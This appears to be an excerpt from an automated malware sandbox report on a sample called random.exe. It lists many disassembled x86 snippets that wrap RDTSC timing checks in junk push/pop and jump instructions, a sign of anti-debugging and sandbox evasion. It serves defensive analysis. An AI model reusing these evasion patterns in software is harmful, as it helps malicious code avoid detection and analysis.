            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8AEFAC second address: 8AEFD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F6B8CF1119Dh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8AEFD2 second address: 8AEFE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F6B8D266C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8AEFE1 second address: 8AEFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8AEFE6 second address: 8AF006 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F6B8D266C36h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6B8D266C42h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8AF157 second address: 8AF15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8B4685 second address: 8B469F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C44h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8B49BD second address: 8B49DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8CF111A9h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8B49DA second address: 8B49DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8B49DE second address: 8B49EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8B49EA second address: 8B49F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8B580C second address: 8B5821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8CF1119Ah 0x00000009 jne 00007F6B8CF11196h 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8B5DC3 second address: 8B5DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8B5DC9 second address: 8B5DF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B8CF111A3h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8B6367 second address: 8B636C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 813B6B second address: 813B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 813B71 second address: 813B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6B8D266C43h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 813B8D second address: 813B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 813B91 second address: 813B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 813B95 second address: 813BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6B8CF11196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6B8CF1119Dh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C0100 second address: 8C0104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C0104 second address: 8C0131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B8CF1119Ah 0x0000000b pushad 0x0000000c jmp 00007F6B8CF111A4h 0x00000011 jns 00007F6B8CF11196h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C0131 second address: 8C013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C013B second address: 8C014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push edx 0x00000009 jl 00007F6B8CF1119Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C02C7 second address: 8C02CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C02CC second address: 8C02DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8CF1119Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C62AC second address: 8C62C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnp 00007F6B8D266C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop eax 0x00000012 jp 00007F6B8D266C3Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C6C93 second address: 8C6C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C6C99 second address: 8C6C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C6C9D second address: 8C6CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C6CB7 second address: 8C6CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C6CBB second address: 8C6CE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Ah 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6B8CF111A2h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C6CE4 second address: 8C6CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C6CEA second address: 8C6D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6B8CF111A1h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8C6D04 second address: 8C6D2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C47h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F6B8D266C36h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8CF2BB second address: 8CF2D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8CF2D0 second address: 8CF2D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8DC5D5 second address: 8DC5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8DC5DB second address: 8DC5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8DC5E4 second address: 8DC5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8DC5EA second address: 8DC5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8DC5EE second address: 8DC60F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6B8CF111A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F6B8CF11196h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8DC60F second address: 8DC613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8E0989 second address: 8E098D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8E098D second address: 8E0993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8E0552 second address: 8E0556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8E8FE9 second address: 8E8FF3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6B8D266C4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F84B5 second address: 8F84BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F84BA second address: 8F84E1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6B8D266C3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6B8D266C3Dh 0x00000015 jg 00007F6B8D266C3Ah 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F864B second address: 8F8651 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F8651 second address: 8F865D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6B8D266C36h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F865D second address: 8F8661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F8661 second address: 8F866C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F866C second address: 8F8672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F8672 second address: 8F86A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 jmp 00007F6B8D266C49h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F6B8D266C36h 0x00000017 jng 00007F6B8D266C36h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F89A4 second address: 8F89A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F89A9 second address: 8F89C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6B8D266C3Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F6B8D266C3Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F89C1 second address: 8F89CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6B8CF1119Ah 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8F8E07 second address: 8F8E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F6B8D266C3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6B8D266C3Fh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8FC7FB second address: 8FC814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6B8CF111A3h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8FC814 second address: 8FC81E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B8D266C36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 9071F9 second address: 907210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A2h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 90EB8B second address: 90EBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6B8D266C36h 0x0000000a jmp 00007F6B8D266C44h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F6B8D266C3Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 90EBBB second address: 90EBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jng 00007F6B8CF11196h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 90EBCD second address: 90EBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 90BEF3 second address: 90BF0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 90BF0E second address: 90BF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 90BF14 second address: 90BF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 90BF18 second address: 90BF1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 91ECF9 second address: 91ECFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 91ECFD second address: 91ED23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6B8D266C3Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6B8D266C40h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 921391 second address: 9213A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6B8CF111A2h 0x0000000c ja 00007F6B8CF11196h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 936A38 second address: 936A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push esi 0x00000008 jl 00007F6B8D266C36h 0x0000000e pop esi 0x0000000f pushad 0x00000010 jne 00007F6B8D266C36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 936A50 second address: 936A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 936A56 second address: 936A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 936D71 second address: 936D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 936EEC second address: 936F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6B8D266C48h 0x0000000b jno 00007F6B8D266C36h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 936F10 second address: 936F28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Eh 0x00000007 jl 00007F6B8CF11196h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 936F28 second address: 936F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 936F30 second address: 936F4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F6B8CF1119Bh 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93725B second address: 93725F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93725F second address: 937269 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6B8CF11196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 937269 second address: 93729F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6B8D266C48h 0x00000008 jp 00007F6B8D266C36h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6B8D266C40h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93729F second address: 9372A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 9372A3 second address: 9372A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93740D second address: 937411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 937411 second address: 937415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 937415 second address: 93741B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93741B second address: 93742C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F6B8D266C36h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93742C second address: 93744B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A9h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 937724 second address: 93772A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93772A second address: 93773A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007F6B8CF11196h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93773A second address: 93773F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93773F second address: 937780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A9h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6B8CF111A1h 0x00000011 jnc 00007F6B8CF11196h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 937780 second address: 93778B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edi 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93BA02 second address: 93BA06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 93BC47 second address: 93BC4C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50BD3 second address: 4A50BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50BD9 second address: 4A50BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
